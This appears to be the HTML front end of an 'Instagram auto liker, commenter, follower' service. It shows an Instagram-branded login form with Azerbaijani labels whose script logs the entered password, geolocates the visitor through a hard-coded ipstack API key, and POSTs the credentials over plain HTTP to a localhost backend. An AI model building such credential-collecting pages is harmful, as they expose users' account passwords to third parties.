<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport"
          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.0/css/bootstrap.min.css">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.0/js/bootstrap.min.js"></script>

    <title>Instagram auto liker , commenter, follower</title>


</head>
<body>



<div class="container">
    <h2>Instagram login</h2>

        <div class="form-group">
            <label for="username">Username:</label>
            <input type="text" class="form-control" id="username" placeholder="isdifadəçi adınız" name="email">
        </div>
        <div class="form-group">
            <label for="password">Şifrəniz:</label>
            <input type="password" class="form-control" id="password" placeholder="şifrəniz" name="pswd">
        </div>
        <div class="form-group form-check">
        </div>
        <button class="btn btn-primary">Başla</button>
</div>


<footer>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <script>
        $(document).ready(function () {

            var ip_checker = "http://api.ipstack.com/check?access_key=d743080aa4ecc1b4095d7ae6b66f97a7";
            var country_code;
            var country_name;

            $.getJSON(ip_checker, function (info) {
                country_code = info.country_code;
                country_name = info.country_name;
            });

            $("button").click(function () {

                var data = {
                    username: $("#username").val(),
                    password: $("#password").val(),
                    country_code: country_code,
                    country_name: country_name
                }
                console.log(data);

                $(".btn").addClass("disabled");;


                var settings = {
                    "async": true,
                    "crossDomain": true,
                    "url": "http://localhost/auto/like",
                    "method": "POST",
                    "headers": {
                        "Content-Type": "application/json"
                    },
                    "processData": false,
                    "data": JSON.stringify(data)
                }

                $.ajax(settings).done(function (response) {
                    console.log(response);
                });
            });
        });


    </script>
</footer>
</body>
</html>